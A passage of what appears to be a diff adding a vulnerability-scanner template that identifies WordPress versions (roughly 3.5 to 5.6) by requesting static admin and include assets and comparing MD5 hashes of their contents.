+ dsl: + - "(\"14e0f61252198b7f5bc6b3954f86495c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"135321308e0cff17720381814fe670fe\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"9b5e58edb3659476950318940d69673e\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"168ab9cfc76d472aa3b19a18b66c1e05\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"0924761e149d1a02d724234b8eb7fdd5\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"862cede744447240baa0e2c7c6014eb3\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"205693de99633c27a39d0c1783b792e3\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"e24995d6dd77c3de2e2a76bdee5878f8\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"5f9aeafda976bdcac79c9eb792607eb4\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"59f2d58002bce3c1c231f856821cdda4\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"d0c2fc2631752d6d9fbb17bac33b0a0e\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - 
"(\"6ac1f0dff2731afc92b387bf90bcbfe4\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"f84934b18bba2ef7087435a63cc7d823\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"af0bff7c54e72b9cfb0980cce35939fe\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"f6a57bc44778998dd4f03246137c77ab\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/light/colors.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"4c299fa424111f5c08a1965011cec210\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"8793d3def979fb16292094f477cecc32\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"ef025447b62b0fb2dfda1cea9f94a0cf\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"7cb25e3697da8c991aafdff1746a2844\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"c64378da84783433e12a436eabb62f79\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"fcb5d20b06e3fd14e30ff9e923992c85\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"71d29edd099575774b911e59e06c12dd\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"e9458e7a35d7956a8d2cbfadb98b630c\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"a33dcc15411e093809cc2a644ef86023\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"8dc3381d0f8e3894c39dd12664c9da35\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"12887d90070563f1d8df477f35e141b3\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"cb875ea5329fb6ae3e3db356473adc84\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f1c96c88b39f8f49af243220e8d3b9e4\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"c3219e4d10fb9173b6943680fb1cef5c\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"0e0a26930fec17520735158ccffacf87\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - 
"(\"67759de92dd9a5b53387ecf2ff9823dc\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"9045e2d84b0efff56c02d3b7cbc5eed8\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"383d77279848f54af0aad27d03493c87\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"2e1fe03f5361c38fab42e0e53ad0d962\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/post.min.js" + matchers: + - type: dsl + name: 4.7 - 5.0.11 + dsl: + - "(\"ede5f7e8431dbeb790e8cf9665192171\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"2be11faf4eac3102801d149351155634\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"c992b68f5eeb27a0b9dea211084c67df\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"663170b582dd9b0d221e28bda521a7ee\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"2592d7b6de8cc11ebacf7b25cea135e0\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"c47dac85d54efe4352e7e5d6045970ab\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"269e1c1bcb01aeb3fad829be7ed4aacd\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"ab0efe0b053c1f256c1162bfacea56ce\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"62e4524aa815499b0051da2cadbf86d1\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"96e5a6b4448a8817566d3575925a9660\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"0b36f334be278c6b5bd7077f95315b69\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"9341ffcbbe31f030b5555739ddee103b\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"c6b980f0fd65f11fce68d0493c933f02\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"ce823a427058873c7251ce707aa717b2\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"1e251e3ba10b2a9d7f3f496cec3ba3df\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"23749291713af38bcd57fc67847b33ac\" == 
md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"a4f6d69eae837efe91c823a67bd6b51c\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"e80d95db0d7ee2b88c1a19e2e936033d\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2ccb4e6d8db314a751d0f26ccb1f3050\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"1cf1102d0221653ce70fa97e66f19fa8\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"dc192b32b16ed7c12cf9e1814f3166e2\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"73cf1fc4bd46ddb72b5ab033c25d7151\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"41983d3c2afbd6dae6a6190bfb30b5ce\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/embed/block.json" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"012e35dbf37c9ffc5ea96cd1bc219658\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.min.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"b6f7093369a0e8b83703914ce731b13c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/accordion.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"b9b89ad1d4f4f85a17bdeadde861d7c2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-puff.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"8daa4348cc13d877079c64dfdcccd69e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-pulsate.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"aa2a0dd249e4cd953b748e971457bff5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/droppable.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"2fbff289eeb05f0a61fdeb47ee0197dd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/tooltip.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"ec26c23c51f5317d809ce60b99a09e96\" == md5(body))" + - 
method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/datepicker.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"f2345031072cd99d8803607892acb5b5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/selectmenu.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"6f8d1878852065716483e58908d12449\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/tabs.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"182baf37339f6cbda563c950beb0c552\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/resizable.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"766bbc6d4f2c95e6ada56e33ad82e0a6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-scale.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"2ccaa13092d3065c4b34072798c274e4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/controlgroup.min.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"dbbe37c4356a29b0002117a9a63ab2f0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/dialog.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"c1e5b1accf5594a2751590cede7acc9c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-slide.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"e5b20c93619b648c827b1532d7b010d8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/checkboxradio.min.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"ca832f201f7fa588f233d58ec95cc4fd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-shake.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"fa3b35c9fb5f8a80ffb4d7e9c6bd22dc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - 
"(\"05be6adb42732a43a883e5b5f5781ff7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-clip.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"5d1c30325b579030563117c87f031551\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-transfer.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"4f1714d4a94ef3188d69e3f71cfed531\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-explode.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"918530b61da416ed692131af8e0b09f2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-bounce.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"c23b42a220e5d607475951fb6ef2dfb4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/autocomplete.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"103a644cfe2aefc145bd031d262a2105\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/slider.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"f5e2ab7dd0c055ebefebc6a4fd87afa2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/progressbar.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"4e1da4893d69f44492e95f7a799d0d33\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-highlight.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"6e2b29c208a7ef1d1eabcd49814c0db6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-fade.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"fa0f7273a34aafcf374f2cec0ce6ff11\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-size.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"613b6c8940a0edb59a7225b9dda20b5a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/draggable.js" + 
matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"13a2fc3a32af84670639d0744cb34489\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/checkboxradio.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"fe2256536412460abfa46ba086833a10\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/mouse.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"d9c1b4ebe4c4b269ea16f0c00db3dbe0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/selectable.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"2139db7166e7d24837ed7b422c9b7ad5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-drop.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"abc1b9e996b48a75298642ac81d131f7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/button.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"a61409f4e92ea9d81ec8b4fc66687e4f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/core.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"03185043abecf50db27be7746ba02278\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/menu.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"a9fb5616376707a2c1aea771b7caa410\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/controlgroup.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"2fd96d0e55bfd44b1a4e5017862a7b8d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/sortable.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"9f6b58c7f1f145079b454cdafb268d1c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-fold.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"cbc47d3a68f942fdd5af7d7a13fb78e9\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/jquery/ui/spinner.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"16e7fc3896c9545869dbf84dc1105984\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-blind.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"ab1dbcf4e37b35b6e60bc51e25816b6f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/reusable-blocks.min.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"5f15dd8e68615a0aa5ab147eb647af58\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/reusable-blocks.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"f57dc6819aaf2bc92ac6cea8849a2f98\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/freedoms.png" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"657f0dd12498195df04f7bf0a2f0fd84\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/privacy.png" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"c6d29f81dd98f505c70487d3bdd87d84\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/auth-app.min.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"8ec531b03666d9538c6b03cafde4cb02\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/auth-app.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"62cead99458abe76011dc34f6b077697\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/application-passwords.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"45f6def0488306f747ae93270b8c1a52\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/application-passwords.min.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"d8279901647f008258e250f8dcfb5652\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/element.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"0767833ec2d557e2fb8cc7cce93d07fd\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - 
"(\"fe88f0268727624b18aad39156e0fcfa\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"67ecb40edbf9ac38971734f2362023c3\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f27ed347732c01ecb68ec39a45bd8b19\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"4281e59a1bbd522ae68bb353b3742372\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"1af0ec7121e09261bbaa00c76b892829\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6d8871831cefb35ae2bd86d1ae855156\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"ff4416a2c0c709dc65eaf5362822ac47\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"be3b6997217abdf27c33dabfaf66044a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/element.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"cfaf798326a1f494c6593161d90faa41\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"058ac8898dad07d85527a9e2983620d5\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"9d3ed277333cb350bac911821d395dad\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"672ab7c0d147a163c03f81a015d1f235\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"5a9a26812516f2b3cbf83f89de6142f3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"49f99b4b03e933aa76efb3fa94633b78\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"89d496444690eac0f660412785f33bf3\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"ecb0cc9b0933db6ca8a0da36ea1b56ed\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8e2a734b9b8a7e0fc63e086866c94e4c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/i18n.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"3762e49b94ff5c920b2134988f7e32dd\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"0ea52e8da6cb91f2af5a5a0505a318a2\" == 
md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f9bba0a9887d37c9a77856c92106c9e0\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"34c000e943a288c66c0abb5d159c0b4b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e2d4275df035d483e9e9f3cddffbb8c5\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"a52a9c5c5045d8837247725f4dcfc1a4\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"542a206a36356b8c5f1e68c77e1d5ac5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"09351928abfc3c611ded68553f891b14\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/list-reusable-blocks.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"9e5728386c1eaa1c6eb5a23eeb9ff0c8\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"af983ce033e97390b9c273b403e4e68a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d86708dfed8ae007dc9232534bfab807\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"aa582350f107018b73961b3a99fda195\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c1852be5984fd31a87311bca5b46a2b8\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f5e7ea66cbc7773c765961a62f248c94\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"944c994d8f0f236431e888e635b9acbd\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c521793f232f4d30a4ca13f4d1ffa118\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/a11y.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"8227a618a371014e3b3eb4c23607a25f\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"a65acec117c4a1fb5f4899bdff312101\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"1a379c26f6d2df6017d269402c6237d0\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"6de67fd83bc890138ef16f2edcf72c7f\" == md5(body))" + - type: dsl + name: 5.4 - 
5.4.4 + dsl: + - "(\"f6c9ab109fb2f780042c6d76f31c932c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"458e5811b2646a6998945e8086da0dbe\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"5321c4e1c69f02d0b44438859a5ef257\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"00ec349ebc2a18936384a4820b49f29d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/i18n.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"53267e22d19e925551ff2f6eecb60c07\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"36f7bb8a849f3fa8e0887c87852af057\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"04879f14a95cd381ffe4198d685f9493\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"88e1c5f8e0b6388d6f3c562c61523029\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f00c40f7643bc657eb99fadcc63edb63\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4d196dccc22591c69e5146e3c4d25a7e\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"11841368d799ad3d3a0eb29350272675\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"582c60610a05cb241219e36fc819828f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/list-reusable-blocks.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"4d9fa198a4229643fa7b513d81d16bd5\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"4e9716f165ab70db6f6aed5e5d0cf5cc\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"08b1277b8584f3a9b4da31de1f6b26eb\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"221072737493c7bce035330aaac6fe4b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"2d8d787282fe64ecffa60624501cef47\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"2736c416eb320581f85a98e39d473347\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - 
"(\"146d338a5e671762578541c6f26c3386\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4b7dc7c7a72767069d5def4625240f07\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/a11y.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"cb439a67a2dbdefec09fec7b57ef64df\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"a7effde2a07e0cd212c26e2423cd7157\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d95ae5d80773496840254ac17641e9b2\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"8b973a699296092e4a14ee6c0ce90cbd\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"8e71effe9f05c722150d7e55d65bac7d\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"1f6917e48f6152db9b461733232240ee\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"f2a1bdcc4acf8cd53814ab777500838c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8c0772e68b1ada104fe3ae885d3a9fe4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/components/style-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"09c39ec3f3e981006dc89fcbd719ec3e\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"c1b549e7ed316bf5a1d38d545923230e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"0a420d9268a69cc187b3578bc2a7f8af\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f77485415d0e8f8227b7b8d532c7080a\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"58a83301414521c957ebbd1e1962431d\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c14fbc464761ecbc3f49c5416aabf658\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"ff2e2dd6cbdd6cd849c3c6dd9e18d4ae\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"c8f2bae9a2da091777c345e132b151ec\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"610ffd816df7670a3483fc56a6f46e9d\" == 
md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/components/style-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"5617ee3edf64f82ccf793554fdcc6dc0\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"23207926b6554158a37d95234a23414f\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2c8cc2a3fc8fcec1e44eb8dbdfc96dc0\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"dffc8b4f8ef9b60d0ad4e21654b9969f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"0edc3e519c5043a2cb9019ea92dcfdfb\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"110d7a6ca1609929fee74f3155516a00\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"b3ee6a2f7296435db208f4de00d460f7\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"3e655c9c09378dfc1af4825ffe5d8297\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5eb72aee24af648536d2c19d2f8abd74\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/components/style.css" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"418b43fb785b1e323213ed7935295a1a\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"ceaf3c35802604ba2964561a5c15cafd\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2600d32822603f50e0070a9e02e96cbb\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ed45deda459cc27cd7b0b09037ce4154\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"90d3b8307d3d10eedac6ef17ade705d0\" == md5(body))" + - type: dsl + name: 